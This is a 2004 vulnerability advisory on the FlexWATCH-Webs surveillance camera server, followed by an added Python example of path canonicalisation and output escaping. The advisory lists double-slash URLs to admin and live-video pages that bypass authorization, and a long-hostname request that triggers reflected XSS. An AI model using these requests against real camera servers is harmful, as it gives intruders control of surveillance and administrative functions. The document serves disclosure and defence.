~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application:  FlexWATCH-Webs
Vendors:      Seyeon TECH Co., Ltd.
              http://www.flexwatch.com/
              http://www.seyeon.co.kr
Versions:     <= 2.2 (NTSC)
Platforms:    Windows
Bug:          Authorization Bypass
Risk:         Very High
Exploitation: Remote with browser
Date:         26 Jan 2004
Author:       Rafel Ivgi, The-Insider
e-mail:       the_insider@mail.com
web:          http://theinsider.deep-ice.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

1) Introduction
2) Bugs
3) The Code

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===============
1) Introduction
===============

FlexWATCH is used for remote administration and as a security surveillance
server. Security camera servers should not be accessible to anyone but the
administrator. Some Las Vegas casinos are using FlexWATCH (tip for them) as
their security surveillance server; it is ridiculous that a company invests
money in software to increase security and instead reduces it. I can only
imagine the risk for a casino which uses this software. FlexWATCH also
contains an FTP server and the machine's dial-up accounts and configuration,
so taking over the machine is also possible.

FlexWATCH describe their product the following way:
------------------------------------------------------------------------
"FlexWATCH(TM) Network Camera and video server series are all stand-alone
video transmission systems to deliver crystal clear real time live video
over the TCP/IP network. FlexWATCH(TM) System has a built-in web server that
enables you to view live video through a standard web browser such as MSIE
or Netscape Navigator. Once you connect the FlexWATCH(TM) System to the
existing network such as LAN, Cable modem, DSL and assign an IP address, you
can view the remote site from anywhere, anytime through a web browser
without any viewing software. Various types of Network cameras and Video
servers are provided by Seyeon technology to meet different customer needs.
For more information go to the Network camera or Network video server page.
By combining with other supporting software and hardware, you can easily
build up various types of solution for remote monitoring and security."

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

=======
2) Bugs
=======

Authorization Bypass:

This is a classic case of "Authorization Bypass", caused by the use of a
double slash when referring to files on the server. Requesting any one of
the following links allows anyone full control over the server:

http:////app/idxam.html
http:////app/idxas.html
http:////app/idxasp.html
http:////admin/aindex.htm
http:////live.html

Cross Site Scripting:

If an attacker requests the following URL from the server:

http:///aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

an XSS appears: the server echoes the request back and allows an attacker to
inject and execute scripts. This vulnerability can allow attackers to rewrite
the contents of the web page by injecting scripts into it. Imagine a client
of one of nextplace.com's clients coming to buy something, and his credit
card and personal details being sent to the "hacker" instead of the company.
Why? Because the "hacker" can spread links and popups to the websites with
the injected scripts, maybe even a new email worm sending evil links to all
the world. In addition, users' cookies (which may contain the same important
data) can be stolen, and creating such evil links will have an effect
forever, because Internet Explorer vulnerabilities of the past and the future
will be a key to hurting the surfers.

In the words of securityfocus.com:
~~~~~~~~~~~~~~~~~~~~~~~~~~
If all of these circumstances are met, an attacker may be able to exploit
this issue via a malicious link containing arbitrary HTML and script code as
part of the hostname.
When the malicious link is clicked by an unsuspecting user, the
attacker-supplied HTML and script code will be executed by their web client.
This will occur because the server will echo back the malicious hostname
supplied in the client's request, without sufficiently escaping HTML and
script code. Attacks of this nature may make it possible for attackers to
manipulate web content or to steal cookie-based authentication credentials.
It may be possible to take arbitrary actions as the victim user.
~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

===========
3) The Code
===========

Authorization Bypass:

http:////app/idxam.html
http:////app/idxas.html
http:////app/idxasp.html
http:////admin/aindex.htm
http:////live.html

Cross Site Scripting:

http:///aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

---
Rafel Ivgi, The-Insider
http://theinsider.deep-ice.com

"Scripts and Codes will make me D.O.S , but they will never HACK me."
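The two defects the advisory describes, the double-slash authorization bypass in section 2 and the reflected XSS in the echoed hostname, both come from deciding on or reflecting raw request data. The following is an added example, written for this page and not code from the advisory or from Seyeon/FlexWATCH. It models a tiny request handler in two variants: a naive one that authorizes on the raw request target (so "//app/idxam.html" never matches the protected prefix "/app/" while the file lookup still opens the same file), and a hardened one that canonicalises the path before the authorization decision and HTML-escapes anything it echoes into an error page. The route names are the ones the advisory lists; the page bodies, host names and the handler logic itself are constructed assumptions for illustration.

```python
# Added example (not from the advisory or from Seyeon/FlexWATCH): why an
# authorization check on the raw request path is defeated by a leading
# double slash, how canonicalising first closes the hole, and how escaping
# the echoed Host header removes the reflected XSS. Route names come from
# the advisory; the page bodies, host names and handler logic are constructed.
import html
import posixpath

# Paths the advisory reports as reachable without authorization.
# A trailing slash marks a whole directory subtree.
PROTECTED = ("/app/", "/admin/", "/live.html")

# Constructed stand-ins for the real pages (placeholders, not real content).
KNOWN_PAGES = {
    "/app/idxam.html": "admin console (placeholder)",
    "/admin/aindex.htm": "admin index (placeholder)",
    "/live.html": "live video (placeholder)",
}


def _path_only(raw_target: str) -> str:
    """Drop query string and fragment. Done by hand on purpose: urlsplit()
    would read '//app/...' as a host named 'app', not as a path."""
    return raw_target.split("?", 1)[0].split("#", 1)[0]


def canonical_path(raw_target: str) -> str:
    """Reduce a request target to the one path the file system will open:
    collapse runs of slashes, resolve '.' and '..', force exactly one leading
    slash, and lowercase because the product runs on Windows, where file
    names are matched case-insensitively (general platform behaviour)."""
    path = _path_only(raw_target) or "/"
    path = posixpath.normpath("/" + path.lstrip("/"))
    return path.lower()


def is_protected(path: str) -> bool:
    """Prefix match against PROTECTED."""
    for p in PROTECTED:
        if p.endswith("/"):
            if path == p.rstrip("/") or path.startswith(p):
                return True
        elif path == p:
            return True
    return False


def naive_requires_auth(raw_target: str) -> bool:
    """Weak check: authorises on the raw target. '//app/idxam.html' does not
    start with '/app/', so it is treated as public."""
    return is_protected(_path_only(raw_target))


def hardened_requires_auth(raw_target: str) -> bool:
    """Canonicalise first, then decide."""
    return is_protected(canonical_path(raw_target))


def unsafe_not_found(host: str, path: str) -> str:
    """Echoes the client-supplied Host header verbatim into HTML (reflected XSS)."""
    return f"<html><body>404: {path} not found on {host}</body></html>"


def safe_not_found(host: str, path: str) -> str:
    """Same page with every reflected value HTML-escaped."""
    return (f"<html><body>404: {html.escape(path, quote=True)} not found on "
            f"{html.escape(host, quote=True)}</body></html>")


def handle_request(raw_target: str, host: str, authenticated: bool,
                   hardened: bool = True):
    """Return (status, body). The file lookup always uses the canonical path,
    mirroring a file system that opens '//app/idxam.html' and
    '/app/idxam.html' as the same file; only the authorization step and the
    error page differ between the two variants."""
    check = hardened_requires_auth if hardened else naive_requires_auth
    if check(raw_target) and not authenticated:
        return 401, "<html><body>401 Authorization Required</body></html>"
    path = canonical_path(raw_target)
    if path in KNOWN_PAGES:
        return 200, f"<html><body>{KNOWN_PAGES[path]}</body></html>"
    body = safe_not_found(host, path) if hardened else unsafe_not_found(host, path)
    return 404, body


if __name__ == "__main__":
    for target in ("/app/idxam.html", "//app/idxam.html", "/app/../admin/aindex.htm"):
        naive = handle_request(target, "cam.example", False, hardened=False)[0]
        hard = handle_request(target, "cam.example", False)[0]
        print(f"{target:28} naive: {naive}  hardened: {hard}")
```

The ordering is the point: canonicalise, then authorise, then open the file, with one shared canonical form so the access check and the file system can never disagree about which resource is being requested. The same rule covers the XSS half: nothing taken from the request (path, Host, or anything else) is written into HTML without escaping.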